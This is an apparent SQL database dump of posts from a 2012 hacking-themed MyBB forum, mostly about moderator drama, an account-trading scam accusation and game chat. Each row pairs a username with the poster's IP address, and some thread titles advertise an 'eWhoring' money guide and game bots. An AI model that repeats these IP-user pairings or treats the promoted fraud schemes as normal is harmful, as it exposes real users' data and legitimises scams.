whats up i was just wondering if you\'s like my logo.next to my name', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '0d55c8264fc411a896d0ac9b860c5809', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4821', '883', '4803', '7', 'RE: Congratz virtual', '0', '1', 't3h jok3r', '1350353004', '[quote=\'iTzIpod\' pid=\'4803\' dateline=\'1350344771\'] How come I don\'t get promoted to SMod? :o [/quote] 1. You don\'t trust me. 2. He is just a Mod. 3. Virtual was promoted because LH partnered up with his website. http://l33thacking.net/thread-887.html', '72.231.24.165', '1223104677', '1', '0', '1', '1350354165', '1', 'eaaf66ec8bc7ed5b17bf4181b1c1f258', '0', '1350354165'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4822', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '100', '??zg???g????61', '1350353047', 'Hey bro I\'ll take whatever this is, lol thanks in advance man ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c52f46ef40699db05d53c6a4612a88e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4823', '887', '0', '3', 'How did virtual become Mod? Explanation here', '0', '1', 't3h jok3r', '1350353469', 'The truth is that he a former S.mod of elite lobby, a site that is owned by my rival. Couple of weeks ago when the site was dead and it had no activity I offered him a S.mod spot but he was away and when he came back LH had already picked up it\'s activity and I had to keep my \"promise/deal\" of making him a S.mod but I couldn\'t so I gave him a Mod position. Virtual ONLY moderates specific forums, HE WILL AND CAN BE REMOVED IF HE ABUSES HIS POWERS OR STAYS INACTIVE/LQ. Now next, I have been counting and I have received the 29th staff request today, the next time someone requests me to make them a staff I will ban them. I have been discussing about making Virtual a Mod with NXK and Apathy, I don\'t pick new staff. It\'s either the community will pick them or all the LH staff discuss and vote for our new mod. Remember the more you request the lower your chances are. Some people that were Mods and staff on LH which were removed will not be added back, they have to build up their chances like everyone else.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '34545e299a973640415db5cccaa32609', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4824', '515', '4805', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1350354091', '[quote=\'iTzIpod\' pid=\'4805\' dateline=\'1350344861\'] Lol. I voted yesterday. You can vote every 24 hours. [/quote] Yup but they won\'t count because the accept unique votes only. As you can see [url=http://forumtopsites.net/?a=stats&u=joker]here[/url] in the \"monthly\" tab that we have 81 total votes but only \"unique\" votes are counted which are 48 this month.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '063c60f8c90ea38c2ea7e682cfdba35b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4825', '829', '4755', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350356034', '[quote=\'iTzIpod\' pid=\'4755\' dateline=\'1350301117\'] I use DarkMystic 3.3 And also BotQuestWorlds 1.8 :p [/quote] Where can I get these?', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '529ad6cf3884e8aef1235c971e9c0bd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4826', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '2', 'Apathy', '1350356139', 'It is a understandable situation. You could not go back on your word.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '72b6476947d8b22668d96a6b8dc38d83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4827', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '2', 'Apathy', '1350356197', 'Reborn this forum is not a post and pm forum. Just post download links.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '238cbb052a23cec07fedb63de4e64c37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4828', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '82', 'iTzIpod', '1350356450', 'Can you explain why I was demoted though? Did I abuse my powers or anything?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dba79ce0e4fb66f4b5338f9316080ce4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4829', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350356489', 'Google it :p Lol OT: Greed why did you scam me? You changed the password on all the accounts. What the fuck bro..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a17d379f64b7bd11297cdef1d2fbd9a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4830', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '82', 'iTzIpod', '1350356522', 'Wait. So is he away or not? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '40227e4ef3661da17ec9874d0ee6d045', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4831', '883', '4784', '7', 'RE: Congratz virtual', '0', '82', 'iTzIpod', '1350356574', 'When did I imply that I did not trust you?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa897d0de1ec48ac96f314de08c73a93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4832', '888', '0', '7', 'Greed is a scammer', '0', '82', 'iTzIpod', '1350357160', 'Greed and I traded accounts yesterday. I gave him MY Personal Minecraft Account including full information. And I went first obviously. And so I gave him my Minecraft Username, Minecraft Email, Minecraft Password, & Minecraft Security Questions. Etc I changed it obviously before we made this trade. So then he payed his end of the deal. He gave me his AQW Account (User & Password) and then changed it to one of my emails. And then I changed the password on it. I got disconnected because the server was overpopulated. And then I tried to log back on. Turns out, I \"typed\" my password wrong. I tried numerous times. Trying to use his password and my password until the account got locked for 10 minutes. And then I tried to contact Greed on Skype. Though he isn\'t offline... What he did? He went on his email and clicked on a link that recovers everything back to normal. So his email is changed back to his, his password is back to normal, etc. But he then changed his password so I can\'t login. Greed. I\'m not butthurt or anything. I just wanted to know why you did that. Explain below?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '770d2b3d62e0ed8a5eb92f0fab5265d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4833', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '3', '??????????¢™', '1350357898', 'Just what I was looking for, Thanks for letting us know.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '92f99cae80ef0bdf4b7601580d6fc90c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4834', '888', '4832', '7', 'RE: Greed is a scammer', '0', '3', '??????????¢™', '1350357981', 'Scammers are not welcome here, Greed explain yourself before we take action.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5416d1a92540f83e18d2f6610b695cae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4835', '699', '4827', '47', 'RE: [All Members] Advance Member System', '0', '3', '??????????¢™', '1350358115', '[quote=\'Apathy\' pid=\'4827\' dateline=\'1350356197\'] Reborn this forum is not a post and pm forum. Just post download links. [/quote] I know it is not a post and pm forum. It doesnt say Post and PM me it says Post below and I will PM you. J0ker said that I could do that. Also IPod I am not away.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '7c15920f1025226e72d2b827bbdf3899', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4836', '888', '4832', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350358280', 'I will be taking care of this when I get a response. I do not Like scammers nor Are they welcome here.', '99.253.94.204', '1677549260', '1', '0', '61', '1350358292', '1', '45bf4950c70d761bb575620833e2b57e', '0', '1350358292'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4837', '888', '4832', '7', 'RE: Greed is a scammer', '0', '82', 'iTzIpod', '1350358648', 'Thanks for doing your job. I wouold\'ve repfucked him since there\'s an option for that now? :o I wonder if Mods can use it. Or if it\'s only SMods and Admins or whatsoever. If only I was a Moderator. :p I would\'ve took action and informed you guys too. Thanks again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1be29fc3df6ecbbc4ea3779b0f493ba0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4838', '887', '4828', '3', 'RE: How did virtual become Mod? Explanation here', '0', '1', 't3h jok3r', '1350358858', '[quote=\'iTzIpod\' pid=\'4828\' dateline=\'1350356450\'] Can you explain why I was demoted though? Did I abuse my powers or anything? [/quote] When I asked you if you want to stay on L33T Hacking or not, you said you will are leaving LH forever and you are going to Anarchy for everso then I asked you if you still want to keep your userbars and you said \"I don\'t care\" so I demoted you but then after 3 days you came back. I can\'t make you a Mod again unless you are active again and build up your chances like others. When I was making the Apple Avatar, you said that you didn\'t forgive me if I\'m not mistaken so how can I make you a Mod again?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec3c89e1ec846ffa021f030c89b330ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4839', '888', '4837', '7', 'RE: Greed is a scammer', '0', '1', 't3h jok3r', '1350359070', '[quote=\'iTzIpod\' pid=\'4837\' dateline=\'1350358648\'] Thanks for doing your job. I wouold\'ve repfucked him since there\'s an option for that now? :o I wonder if Mods can use it. Or if it\'s only SMods and Admins or whatsoever. If only I was a Moderator. :p I would\'ve took action and informed you guys too. Thanks again. [/quote] Woah Woah Woah, I can say tomorrow that I\'m the son of \"Barack Obama\" but no one would believe me because there\'s no proof. We will take the necessary actions, we can not repfuck anyone on anyones request. Since NXK and IP are on it I will let them take care of it but off course look through the PMs. Can you post some screenshots of the deal? Thanks for the report and can you tell us if you discussed this deal on Skype, LH or other instant messengers? Even if it was offsite we need as much information as possible.', '72.231.24.165', '1223104677', '1', '0', '1', '1350360223', '1', 'a189bfc9211fc24b7ff41ed81a3a6716', '0', '1350360223'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4840', '886', '4820', '35', 'RE: My logo', '0', '222', 'Exposé', '1350359435', 'Honestly I dont love it...it\'s too simple', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'de0781dfa2deb0431022794902f0db6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4841', '883', '4831', '7', 'RE: Congratz virtual', '0', '1', 't3h jok3r', '1350360350', '[quote=\'iTzIpod\' pid=\'4831\' dateline=\'1350356574\'] When did I imply that I did not trust you? [/quote] I have nothing against you but if you haven\'t forgiven me so obviously you have something against me which brings it down to the fact that you might not trust me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '96bbcbb581cb2fa4ae35c15c3d3b50a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4842', '889', '0', '3', 'Vote for a new theme', '0', '1', 't3h jok3r', '1350361900', 'This thread will be moved in 2 days. Vote for L33T Hackings new theme. Feel free to post your suggestions or themes that you think will look good on LH. [b]Theme 1[/b] [spoiler] [img]http://www.themefreak.net/img/gthree/index.png[/img] [/spoiler] [hr] [b]Theme 2[/b] [spoiler] [img]http://www.audentio.com/images/portfolio/sites/large/glowing.jpg[/img] [/spoiler] [hr] [b]Theme 3[/b] [spoiler] [img]http://www.audentio.com/images/portfolio/sites/large/darkice.jpg[/img] [/spoiler]', '72.231.24.165', '1223104677', '1', '0', '1', '1350362027', '1', '294435bf750d30f7c03cfdf8cb884a94', '0', '1350362027'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4843', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '84', 'Thunder™', '1350362617', 'Lol i was former admin of elite lobby u will make me admin :P', '111.91.75.158', '1868254110', '0', '0', '0', '0', '1', 'caec3191e2b604ed7d351d5e0eabaa6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4844', '869', '4712', '74', 'RE: who loves counter strike', '0', '84', 'Thunder™', '1350362687', 'I like CounterStrike :)))', '111.91.75.158', '1868254110', '0', '0', '0', '0', '1', '2e041600bb56996697fd0af1c96342e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4845', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '53', 'sirchamp', '1350373235', 'Can I have the download.link thanks.', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '46191ae8fef11b9c22cc3d2a59850b0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4846', '888', '4832', '7', 'RE: Greed is a scammer', '0', '62', 'R?????zo?', '1350374007', 'I think the fact that Greed is not replying to this thread it makes him scammer already. Oh well, sorry to hear that iTzIpodz', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '738e49bb855c4f082eb2af0d4ba83c2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4847', '885', '4812', '71', 'RE: Who Has Already Pre-Ordered Black Ops 2 ?', '0', '62', 'R?????zo?', '1350374106', 'I pre-order the normal version, i won\'t play that much though :P', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '28c82b79d1e22e24543d541ae9363922', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4848', '868', '4710', '71', 'RE: whats the best COD', '0', '62', 'R?????zo?', '1350374171', 'Fyi Zombie mod exist since COD1 :)', '46.189.174.135', '784182919', '1', '0', '62', '1350374225', '1', '0a5012b1026948f5dfde5bfec86e735b', '0', '1350374225'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4849', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '62', 'R?????zo?', '1350374312', 'Can I have this? Thanks in advance bro.', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', 'afbd15a7f9d05d7d2008bc2ec9f4aeac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4850', '780', '4024', '17', 'RE: Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '62', 'R?????zo?', '1350374634', 'Your welcome, hopefully someone can make some good use of it.', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '399e20afce14ddf28c01ae5dfc05756d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4851', '881', '4775', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '0', '62', 'R?????zo?', '1350374706', '2nd one looks better indeed :)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', 'eac0db5907fb032c50cedfef7b38161b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4852', '886', '4820', '35', 'RE: My logo', '0', '62', 'R?????zo?', '1350374834', 'If you mean your avatar, no I don\'t.', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', 'dec007b70a67373fb5029dd39d209be0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4853', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '62', 'R?????zo?', '1350375081', 'I was mod on elite lobby too :> but I don\'t want to become one anymore ;)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '657e804423dec40350a56f41dca75819', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4854', '883', '4784', '7', 'RE: Congratz virtual', '0', '62', 'R?????zo?', '1350375131', 'Congratz Virtual Legend ;)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '57748ef25aacac85ca0cc66ab1db9ae6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4855', '869', '4712', '74', 'RE: who loves counter strike', '0', '62', 'R?????zo?', '1350375242', 'I like CS, I still play abit of CS:GO But I played every single one :P', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '0c599439978052e96473c707ec3c4981', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4856', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '62', 'R?????zo?', '1350375308', 'Can I have the download, thanks alot. This seems interesting :)', '46.189.174.135', '784182919', '1', '0', '62', '1350375342', '1', '66b7534672bfcf9a89544ac0a5a5e564', '0', '1350375342'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4857', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350375523', 'We are growing, atleast when I check new posts it has alot of how it sed to be. We need to keep it up, refer people guys :)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '992cd08b0999a9d8da6c3be263aeb608', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4858', '888', '4832', '7', 'RE: Greed is a scammer', '0', '257', 'XxTREYZxX', '1350377069', 'greed just proved hes a scanner by not replying to this thread as you were saying. and iTzIpod i feel so sorry for you :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'd449f1b3e1ed8812e929fa8617672bde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4859', '881', '4775', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '19', '257', 'XxTREYZxX', '1350377402', 'yeah i really like the second one :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '7825c370b0993b6063710f60ce5b830b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4860', '890', '0', '71', 'Boreder lands 2', '0', '257', 'XxTREYZxX', '1350379627', 'hey l33T and i just wanted to say who is getting borderlands 2, i am defiantly getting i think its great, thanks', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'ea3f97f69da7ae3df726719f46b615b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4861', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '100', '??zg???g????61', '1350383495', 'Vouch! Thanks for the code ;DDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd4bff1e854e62ed49bbfee90382b2de9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4862', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '100', '??zg???g????61', '1350384119', 'Ahhh thanks for the explanation I was wondering.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '5176aed1d088dabb2a944f5fa6341b46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4863', '869', '4712', '74', 'RE: who loves counter strike', '0', '100', '??zg???g????61', '1350384365', 'Meh I played the game a bit I didn\'t really like it though.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9b5908ebede8dab08a22aa251af362e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4864', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '205', 'mothered', '1350386819', 'It\'s good that you got this out In the open here, and clarified It for everyone to see.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '24371d98a9bccbb99fd656237ac951ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4865', '883', '4784', '7', 'RE: Congratz virtual', '0', '205', 'mothered', '1350387037', 'I don\'t know Virtual, but congratulations from me. From what I\'ve read about you, I\'m sure you\'ll do a great job.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a2e9a4bb32517fff1a00de5034441cbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4866', '882', '4845', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350387089', '[quote=\'sirchamp\' pid=\'4845\' dateline=\'1350373235\'] Can I have the download.link thanks. [/quote] [quote]Can I have the download, thanks alot. This seems interesting [/quote] I have send both of you the Download link. Check your Inbox', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 